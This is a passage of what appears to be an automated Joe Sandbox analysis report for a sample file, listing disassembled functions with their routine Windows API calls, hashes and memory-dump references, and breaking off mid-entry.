Opcode Fuzzy Hash: 06982c0876210ee6d64f1c79b5f908cf646cf6e733eec8ef9544c69ef43d2657
Instruction Fuzzy Hash: F9E03925200626E6D731AB769C01BEB7E48DF913B0F290123AC47A6692CFE5CC0186F5

Function 00D9AFD0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00D9AF75,E7604376,00000000,00DC517A,000000FF,?,00D98882,?,?), ref: 00D9AFEB

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a09db7801140b5ec74778162213da97470f7e5174ddff8ab8d989ac7a3cb09ca
Instruction ID: bb01dc54bb1942f6df19df6c674861e46608a5baa59e7cd01eb6b760656e51df
Opcode Fuzzy Hash: a09db7801140b5ec74778162213da97470f7e5174ddff8ab8d989ac7a3cb09ca
Instruction Fuzzy Hash: 40F0BE71182B028EDF308E24D848792B3E4AB12329F081B1ED0E7429E0D360A98D96A1

Function 00D9C37A Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00D9C4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000), ref: 00D9C4E6
Part of subcall function 00D9C4A8: FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?), ref: 00D9C516
Part of subcall function 00D9C4A8: GetLastError.KERNEL32(?,?,00000800,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000,0000003A), ref: 00D9C522

FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,00D987BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00D9C3A5

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: fb4061e462243a58535335fa4f7e63a6fa4e882ed3c6ead4b4153cc5c0dd8111
Instruction ID: 234ed2276895c6d8616db7027e02640fe4a8232c1649e2f55c9eaf8b1c8962dc
Opcode Fuzzy Hash: fb4061e462243a58535335fa4f7e63a6fa4e882ed3c6ead4b4153cc5c0dd8111
Instruction Fuzzy Hash: B0F08235018790ABCF221BB45905BC67B909F2A332F04CB4AF1FE52192C6B560949B32

Function 00DA2EE4 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00DA2F19

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: cff8c40114ae7f4a564b71b170788afe1e9065d91c5db190f282e063a40e56c8
Instruction ID: 93ce72ce96357e42d9eeb4c87ae4230039157650337c97b8830b6e96cea80737
Opcode Fuzzy Hash: cff8c40114ae7f4a564b71b170788afe1e9065d91c5db190f282e063a40e56c8
Instruction Fuzzy Hash: B2D05B11A1921159DB16372A7C06BFD16579FC3325F5C0067B109B77C78B5A0C8293F2

Function 00DAC5B6 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00DAC5BC

Part of subcall function 00DAC34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00DAC36E

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
Instruction ID: b0d4038b278f219354eed9d15d6970b22e3c2d2140a8b570ba29d1c864bfc11b
Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
Instruction Fuzzy Hash: 53D0A731624249F6DF026B20CC0297E7594DB01350F0080217842C9180FDB1DA106971

Function 00DB017F Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00DB01A4

Part of subcall function 00DAD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DAD875
Part of subcall function 00DAD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DAD886
Part of subcall function 00DAD864: IsDialogMessageW.USER32(0001040E,?), ref: 00DAD89A
Part of subcall function 00DAD864: TranslateMessage.USER32(?), ref: 00DAD8A8
Part of subcall function 00DAD864: DispatchMessageW.USER32(?), ref: 00DAD8B2

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: e99e4a52df2814dbdc34ab4a234f653896a0d140130737c7ad2db21bb645060c
Instruction ID: e80afdce7e9b7d0c36168c61aa1580d6445a73bdb2e76d45c181260c306007a7
Opcode Fuzzy Hash: e99e4a52df2814dbdc34ab4a234f653896a0d140130737c7ad2db21bb645060c
Instruction Fuzzy Hash: 6CD09E31158300AAD6012B56CD06F1A7AA2FB99F05F404555B289740F186629D31EB36

Function 00DB0A98 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00DB0AC0

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 716029338f65cce6ca1a055a2244021b04aa7059c11cb70fa4fd58304a7c27cc
Instruction ID: bb80601fe98a2f24133bb501e66f398998e455c10271dc38d52c451bce90fa7b
Opcode Fuzzy Hash: 716029338f65cce6ca1a055a2244021b04aa7059c11cb70fa4fd58304a7c27cc
Instruction Fuzzy Hash: EED0C730502755DDC211A754AC8A7B62D50F308704F554444BA47D6198DFB05480D535

Function 00D9B288 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00D9B18A,?,?,?,00000000,00D9B662,?,?,00000000,?,?), ref: 00D9B294

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 1de369f6d6cd5d241a0c4545f1fd32e839330bdab05cd23a82fb80f3a3ddecea
Instruction ID: 32fa3bb1862dac72915821b94843b8f58f211348320cc8fa87e0514d3e506b07
Opcode Fuzzy Hash: 1de369f6d6cd5d241a0c4545f1fd32e839330bdab05cd23a82fb80f3a3ddecea
Instruction Fuzzy Hash: 29C01234000105954F304724AA4545C7311DE523767B98295C028C90A1C323CC43F624

Function 00D96B70 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D96B77

Part of subcall function 00DA11A5: __EH_prolog3.LIBCMT ref: 00DA11AC

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 1e17d8939ac3d97c5d675b32a9c03de6cb47101ca00d8e2f07b87d0ec10cb14b
Instruction ID: 1e08c9734f0931834b29737b6ccb419445cda7d2952c76ead647b1511c77af8a
Opcode Fuzzy Hash: 1e17d8939ac3d97c5d675b32a9c03de6cb47101ca00d8e2f07b87d0ec10cb14b
Instruction Fuzzy Hash: 74C012A8F0462283FB12B7A4842339C60A0EF44B05F800059F201AB382CBB80B0187BE

Function 00DB06DD Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c0a13808c17bad19d58de2949f3480448c199ef6f762a16098bb1eff2b951cf9
Instruction ID: 7b3ec339c49e896e16f3d41b71d4bb5ff02ef9f7da076dd40c0222ef6aa52b33
Opcode Fuzzy Hash: c0a13808c17bad19d58de2949f3480448c199ef6f762a16098bb1eff2b951cf9
Instruction Fuzzy Hash: 49B09285258242ED224852485802DFB060CC1C0B10321C52AF00AC1280944058590031

Function 00DB06D3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7635da4639a15625b127b48e1dfe8bdc5b7ff4dfc16d4bd4aa68302940005943
Instruction ID: b40fdfadbf95f50ad6bd5bcfa1fa89a398bd92649e3d0160fc8e34ab3bb3433d
Opcode Fuzzy Hash: 7635da4639a15625b127b48e1dfe8bdc5b7ff4dfc16d4bd4aa68302940005943
Instruction Fuzzy Hash: 40B0128635C203FD310857485C02DFF060CC1C0B10331C43FF40EC1280D4405C0D0031

Function 00DB06C9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 535368b95725fdfc0c3999f18de69d908b80367acd933c9fe4bc317e8d874a89
Instruction ID: 07be736a3142e31b6ad90111d1e1585b74c70158be62083366b26b76cb32497b
Opcode Fuzzy Hash: 535368b95725fdfc0c3999f18de69d908b80367acd933c9fe4bc317e8d874a89
Instruction Fuzzy Hash: 99B0128935C307FD310453485C02DFF060CE1C0B10331C43FF00AC1280D4405C090131

Function 00DB06FB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 450b0bcb53876a2b7ed150e86e4d91622d3e0daa2aed0c1c1843c8c5223cade8
Instruction ID: dfdd9bf332d9b32de636f375c1aab3477e7b2a76327c5c98205bfd17ed9e8885
Opcode Fuzzy Hash: 450b0bcb53876a2b7ed150e86e4d91622d3e0daa2aed0c1c1843c8c5223cade8
Instruction Fuzzy Hash: 6AB0129535C203FD310457485C02DFF060CC1C1B10331D43FF40AC1180D4405E090031

Function 00DB06F1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 99d37bbec93c10ae79bd774f372f5ac0f90adbe4634c82aa72eabbbd8f2b593e
Instruction ID: f4090df010ef3a516f601ef1689b1f067c54a118c3944549b22cdfd33bdafa70
Opcode Fuzzy Hash: 99d37bbec93c10ae79bd774f372f5ac0f90adbe4634c82aa72eabbbd8f2b593e
Instruction Fuzzy Hash: BEB0128535C203FD310853985C02DFF060CD1C0B10331C83FF00EC1280D4405C0D0031

Function 00DB06E7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 46c2c5ef12acb33f783c93de270cbac284f25678969f97cb77d476754a40591c
Instruction ID: 7cea471cc390ba37adf6d007bd3e4b360c1279c5e1ddb404c8d461d925b6c99a
Opcode Fuzzy Hash: 46c2c5ef12acb33f783c93de270cbac284f25678969f97cb77d476754a40591c
Instruction Fuzzy Hash: A1B0128535C203FD310853485D02DFF060CC1C0B10331C47FF40EC1280D4405D1E0031

Function 00DB0697 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dd00758eaebc71a11d772960aa8e4b687614ed5645be1141f17f0df38fb3c223
Instruction ID: f735899e035a046ca5628495ad97bc0115835defb89923bb4c54919ba9357149
Opcode Fuzzy Hash: dd00758eaebc71a11d772960aa8e4b687614ed5645be1141f17f0df38fb3c223
Instruction Fuzzy Hash: D9B0128535C203FD31045348AD02DFF061CC1D0B10331C67FF40AC1180D4405D1B0031

Function 00DB06B5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4d2159d976d7746a166088badb76d5bcbcff51b6c0bbccb6e52f34fe403e60bb
Instruction ID: 137d67237371d5f96d3c06241a83a2d6e888544b70bf404d53e78d44d7ed73f4
Opcode Fuzzy Hash: 4d2159d976d7746a166088badb76d5bcbcff51b6c0bbccb6e52f34fe403e60bb
Instruction Fuzzy Hash: F0B0128935C303FD324453485C02DFF060CD1C0B10331C53FF00AC1280D4405C594031

Function 00DB06AB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DB068E

Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

